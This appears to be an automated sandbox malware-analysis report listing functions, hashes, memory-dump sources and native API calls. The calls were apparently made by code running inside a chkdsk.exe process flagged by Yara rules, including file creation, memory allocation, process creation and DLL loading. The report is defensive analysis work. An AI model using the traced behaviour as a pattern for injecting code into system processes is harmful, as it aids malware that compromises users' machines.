Instruction ID: 7b91c55868fa640606e59dc87692d65b3ff529ec2775453b952c0b0115785fe7
Opcode Fuzzy Hash: f5327e0f319e37b00d3350855d3bd838e13548840f1ee85600155f8a68142153
Instruction Fuzzy Hash: 799002E122140503D64065596804607010597D0343F61D021A2064555E8A698C61B175

Uniqueness

Uniqueness Score: -1.00%

Function 00C29560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
Instruction ID: 271796278df357bad4deee0f44f57b5d62b325f31649b537bbdd0fe254fb7402
Opcode Fuzzy Hash: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
Instruction Fuzzy Hash: 839002A5231001020645A559260450B0545A7D63927A1D025F1416590CC6618875A361

Uniqueness

Uniqueness Score: -1.00%

Function 00C29520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb7b3cabd52c45682ee4392ea3d21eb6b01a351849d85c8985a8755fe2dc4d8
Instruction ID: 6d7175d7d06c8abfe1a73a583d056b4c91b9c75b689d5d9a12acabf8f4cd7a76
Opcode Fuzzy Hash: bdb7b3cabd52c45682ee4392ea3d21eb6b01a351849d85c8985a8755fe2dc4d8
Instruction Fuzzy Hash: 5C9002E1221141924A00A259A404B0A460597E0342F61D026E1054560CC5658861E175

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2138992b6e03d961fa44686bccb088f41a7606a67b5c28e1ca79badcbc7c6f5
Instruction ID: 0b430aebfffe0432406c51ab3f199284030409a4b6bcaa9b60dd7d6c477c70d4
Opcode Fuzzy Hash: b2138992b6e03d961fa44686bccb088f41a7606a67b5c28e1ca79badcbc7c6f5
Instruction Fuzzy Hash: 659002B1A25001129640715968146464106A7E0782F65D021A0514554C89948A65A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00C296D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
Instruction ID: 4780682ef170f8e50222bb57ffbcd7ba3295b6edb2a1d11f098e642bfa54ac91
Opcode Fuzzy Hash: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
Instruction Fuzzy Hash: 3A9002B122100942D60061596404B46010597E0342F61D026A0124654D8655C861B561

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79002f1f531d14d66b462adae09082d65743d01bd4c80ce0519f17acb45a8409
Instruction ID: d5111bf74708527f96c8bb9d880ac6c82cc55e15d306af0c124a47428d77ea86
Opcode Fuzzy Hash: 79002f1f531d14d66b462adae09082d65743d01bd4c80ce0519f17acb45a8409
Instruction Fuzzy Hash: A89002A122144542D64062596804B0F420597E1343FA1D029A4156554CC9558865A761

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a72f4911982a8b8cc8c309c093c97eeec9ff14d70e18d075106292b9eb6be98
Instruction ID: 71284ed602a2edef9f49db8baf1698544ba0fd4276d5f70d4f221c3e09681487
Opcode Fuzzy Hash: 2a72f4911982a8b8cc8c309c093c97eeec9ff14d70e18d075106292b9eb6be98
Instruction Fuzzy Hash: B79002B122140502D60061596808747010597D0343F61D021A5164555E86A5C8A1B571

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5669371b70a2988daf4c38c6ed0001bd5bc78228dd0e99bab7e628e28e3d7741
Instruction ID: e8cbca7b528ea50e655b2babefae2aee02ef4ab253abfed8a92ba48c02d29ee3
Opcode Fuzzy Hash: 5669371b70a2988daf4c38c6ed0001bd5bc78228dd0e99bab7e628e28e3d7741
Instruction Fuzzy Hash: 309002B122144102D6407159A44460B5105A7E0342F61D421E0425554C86558866E261

Uniqueness

Uniqueness Score: -1.00%

Function 00C29B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daebe8896aa3fea9a2fdd5fa99a33d7ceb0c2bcf80a9c636399730aee2757439
Instruction ID: 19fadd2a364cb43abe6d61388c442b021dbdb70f1fce0c8eb1eea64c029f90d0
Opcode Fuzzy Hash: daebe8896aa3fea9a2fdd5fa99a33d7ceb0c2bcf80a9c636399730aee2757439
Instruction Fuzzy Hash: 819002A126100902D6407159A4147070106D7D0742F61D021A0024554D86568975B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00C7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L00C2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00C75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00C75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00c7fdda
0x00c7fde2
0x00c7fde5
0x00c7fdec
0x00c7fdfa
0x00c7fdff
0x00c7fe0a
0x00c7fe0f
0x00c7fe17
0x00c7fe1e
0x00c7fe19
0x00c7fe19
0x00c7fe19
0x00c7fe20
0x00c7fe21
0x00c7fe22
0x00c7fe25
0x00c7fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C7FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C7FE01

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
Instruction ID: 88a5d5a3d55efaae925151bd760e0725c00de396db6a47c6af9fc178524108ac
Opcode Fuzzy Hash: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
Instruction Fuzzy Hash: FCF0F632200641BFD6241A55DC42F23BB6AEB44730F248315F628566E1EAA2FC20A6F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exe PID: 5412 Parent PID: 6040 chkdsk.exeCOMMON

Executed Functions

Function 04CD818D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D

Strings

.z`, xrefs: 04CD820D, 04CD8218

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: b87aeccf9c780add8254e184b1f90f1a4465a1834338ca1cd772a9b941d60a71
Instruction ID: 875cb495eea85f8de9e54930baaac3a6cd60d1afb3731408f0febafc2dcc06c1
Opcode Fuzzy Hash: b87aeccf9c780add8254e184b1f90f1a4465a1834338ca1cd772a9b941d60a71
Instruction Fuzzy Hash: 761190B2614209ABDB08DF98DC85DEB73AEAF8C754F158648BA1997241D630EC11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CD81CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D

Strings

.z`, xrefs: 04CD820D, 04CD8218

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: b7233180f1a2a08244d762850083161ecf4ddca1709c7ff8d811d5d98f439070
Instruction ID: 07aeb0ad2b5c95e58e5568625ba4e631625fa156aaece81dc598e923a22173a5
Opcode Fuzzy Hash: b7233180f1a2a08244d762850083161ecf4ddca1709c7ff8d811d5d98f439070
Instruction Fuzzy Hash: 3901AFB2204108AFCB58CF98DC85EEB77A9AF9C354F158248FE1D97241D630EC11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CD81D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D

Strings

.z`, xrefs: 04CD820D, 04CD8218

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d3d6fa73f07b17fcc427760c0f8c9c569c5b51007010452fc3ee2ecee3517f2d
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 9FF0BDB2200208ABCB08DF88DC84EEB77ADAF8C754F158248BA1D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CD83AA, Relevance: 1.6, APIs: 1, Instructions: 53memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04CC2D11,00002000,00003000,00000004), ref: 04CD83E9

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a250176d316e2fb3a194b34481d49198d296d124c15f5b1cc196cea366f46a87
Instruction ID: e117879fe63b1b1b9ac68698fdabd409a04f09b4d721fc0d0c6136a4f82e73fa
Opcode Fuzzy Hash: a250176d316e2fb3a194b34481d49198d296d124c15f5b1cc196cea366f46a87
Instruction Fuzzy Hash: 8F0116B6200209ABDB14EF98DC85DEB77AEEF88654F118509FE1997341D630E921CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD827A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(04CD3D62,5E972F59,FFFFFFFF,04CD3A21,?,?,04CD3D62,?,04CD3A21,FFFFFFFF,5E972F59,04CD3D62,?,00000000), ref: 04CD82C5

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d218f83dd6e9f7fe4ee4ac4d9e03152587d1c023c7b5d581cfb14b96684e8d3e
Instruction ID: 0eef64b4eda85757618d5b41e6e43c060c045ccd0a07c3feabe7b1dae7414ca1
Opcode Fuzzy Hash: d218f83dd6e9f7fe4ee4ac4d9e03152587d1c023c7b5d581cfb14b96684e8d3e
Instruction Fuzzy Hash: 17F0F4B2200209AFCB14DF88DC90EEB77A9AF8C314F158649FA5D97241C670EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(04CD3D62,5E972F59,FFFFFFFF,04CD3A21,?,?,04CD3D62,?,04CD3A21,FFFFFFFF,5E972F59,04CD3D62,?,00000000), ref: 04CD82C5

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c1efec448e11188c2e3c5db83f3d808b679c2c91f3e8319a4605cb59d6aa0715
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 92F0A4B2200208ABDB14DF89DC80EEB77ADAF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD83B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04CC2D11,00002000,00003000,00000004), ref: 04CD83E9

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 86ca65043f1d8c9ceb5f730f3828c63f7fc62bcaeee02d5a42d7f91bcc1172a1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 9AF015B2200208ABDB14DF89CC80EAB77ADAF88654F118148BE1997241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD82FA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(04CD3D40,?,?,04CD3D40,00000000,FFFFFFFF), ref: 04CD8325

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e5f93ebfd0e491e38d0e4a533eda5161ba1a4ebbdeadb8b6ab030f4975ed40bb
Instruction ID: 345e7824e08a64de40397ccb97b9b6e0d94140ad967ce334f8b219991311c881
Opcode Fuzzy Hash: e5f93ebfd0e491e38d0e4a533eda5161ba1a4ebbdeadb8b6ab030f4975ed40bb
Instruction Fuzzy Hash: 24E086756402047BD710EBA4CC45ED77B59DF44260F154599B95A9B241D574E500CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(04CD3D40,?,?,04CD3D40,00000000,FFFFFFFF), ref: 04CD8325

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 1e002a064d5060e57b1a4b9e30ec00ab2ea7aa3759618228b539bc0034c5f07f
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5BD012752003146BD710EF98CC45E97775DEF44650F154455BA195B241C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD6EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 04CD6F98

Strings

net.dll, xrefs: 04CD6F61, 04CD6FE7, 04CD6FBF, 04CD6FCB, 04CD6FF3
wininet.dll, xrefs: 04CD6F4E, 04CD6F57

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 5445f210f931d6d31ccf1e2678a1e6dafaba71c8141ee6eb17c17fee286e3a9d
Instruction ID: 5cd06a36c602014cde4295341eaf097ee61033ec963630c349f41817472d449d
Opcode Fuzzy Hash: 5445f210f931d6d31ccf1e2678a1e6dafaba71c8141ee6eb17c17fee286e3a9d
Instruction Fuzzy Hash: D1317EB5602704ABD725DFA8C8A0FABB7F9FB88704F04851DF61A5B281D730B545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CD6EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 04CD6F98

Strings

net.dll, xrefs: 04CD6F61, 04CD6FBF, 04CD6FCB
wininet.dll, xrefs: 04CD6F4E, 04CD6F57

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 1dcf24c61d214a284568d8c5ee12ba4712b34f102b42bfb5e4522338d655b784
Instruction ID: e41cee2ddefc692d2085c51f48d15b4c55ba18831b2fde4b54e974405290d2b9
Opcode Fuzzy Hash: 1dcf24c61d214a284568d8c5ee12ba4712b34f102b42bfb5e4522338d655b784
Instruction Fuzzy Hash: 5C316FB5A01704ABD715DF68C8A1FABB7B9FF88704F04802DF6195B281D770B545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CD84D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04CC3B93), ref: 04CD850D

Strings

.z`, xrefs: 04CD84FC, 04CD8508

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 55b769a0856065b93ea23f3b2b280919e1fbcba2ef20a7310c0dcc862ab0a13b
Instruction ID: 7c167a0acbe0ae6f705ebca87bb6d5b60c812167f5550b5b60bfedf40caa8ac0
Opcode Fuzzy Hash: 55b769a0856065b93ea23f3b2b280919e1fbcba2ef20a7310c0dcc862ab0a13b
Instruction Fuzzy Hash: 8CE0EDB5204249BBD714EF24CC44EA73BA8EF84354F0446A8F9695B251C631EA01CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 04CD84E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04CC3B93), ref: 04CD850D

Strings

.z`, xrefs: 04CD84FC, 04CD8508

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 33aa1c3f9e53b691bcbd5dfe860fca47cfefae5dcbe1b715b38a0eb2b8b2803d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 83E046B1200308ABDB18EF99CC48EA777ADEF88750F018558FE195B281C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC7270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04CC72CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04CC72EB

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction ID: 73ceed912045ad6c0b0251ccc7c0e7b41c1236dc26076e9fd55f799bd2fba321
Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction Fuzzy Hash: 0B01D671A80228B7F720A6948C02FFE776D9F00F55F150119FF04BA1C0E6A57A0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 04CD7013, Relevance: 1.6, APIs: 1, Instructions: 124threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04CCCCE0,?,?), ref: 04CD705C

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 10fbdd892e07f169d2564ba58d697aaa7dbe6fd45c90b5e0cac74145f243c590
Instruction ID: 1030c08096543040b3569e33004588748b3e00565596231b3b1dd804ffb86070
Opcode Fuzzy Hash: 10fbdd892e07f169d2564ba58d697aaa7dbe6fd45c90b5e0cac74145f243c590
Instruction Fuzzy Hash: 97419FB6601705BBD724DFA4CCA1FE7B3AAEF84358F084519F65997280DB70B905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04CC9BA2

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 359c4325895153f8dde6f1b582d9670357540ce517d4e331c2eb35ad5d9fd085
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 3F011EF5D0020DBBEB10DAA4DC41F9EB7B99B44308F004199EA1897241F671FB54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04CD85A4

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: f3a7e8f2e083bf6dd202b0c1f2f3d3e132bd169a7bc4017cb72f285bc24d6d7f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7801AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CD7020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04CCCCE0,?,?), ref: 04CD705C

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
Instruction ID: 37b3ad0bb9126ffacbe6a78cd3df27bff155da69246e007ffe59eff16c96d195
Opcode Fuzzy Hash: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
Instruction Fuzzy Hash: 2AE092333813043AE3306599AC02FE7B39DCB85B34F14002AFB0DEB2C0D595F90142A5

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8632, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,04CCCFB2,04CCCFB2,?,00000000,?,?), ref: 04CD8670

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 65dd512553438aaedb98fec24e4df9bb5bea5622c2e49db2e56867d6f817d2dd
Instruction ID: d737a7596f0011db7f7d87a3cc46111ebc2baa9cfd6dffb4cc2a7f431c7a23fa
Opcode Fuzzy Hash: 65dd512553438aaedb98fec24e4df9bb5bea5622c2e49db2e56867d6f817d2dd
Instruction Fuzzy Hash: 7EF0E5F05083906FD710EF20DC44E8B7FA8DF89210F05859EFC881B142C531A415CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 04CD84A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04CD3526,?,04CD3C9F,04CD3C9F,?,04CD3526,?,?,?,?,?,00000000,00000000,?), ref: 04CD84CD

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 63e0f07a96740b6982913b1877eeb145a98085a26b89a6e4b61fa490982c1350
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 95E046B1200308ABDB14EF99CC40EA777ADEF88654F118558FE195B281C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 04CCD418, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,04CC7C73,?), ref: 04CCD44B

Memory Dump Source

Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fa6d2b2b93c1b91226d715a951732bd64cc1f5516d7ab3ba637dd05ec3a76d8d
Instruction ID: 20c618cbc095d8fb1db95269deaa24e49c6a99fd3d843aca194e676fd7b3281f
Opcode Fuzzy Hash: fa6d2b2b93c1b91226d715a951732bd64cc1f5516d7ab3ba637dd05ec3a76d8d
Instruction Fuzzy Hash: 6AE0C2756402007BE710EFB4CC43F9A7356AF98710F088078F949D76C3DA20E0018A62

Uniqueness

Uniqueness Score: -1.00%

Function 04CD8640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,04CCCFB2,04CCCFB2,?,00000000,?,?), ref: 04CD8670

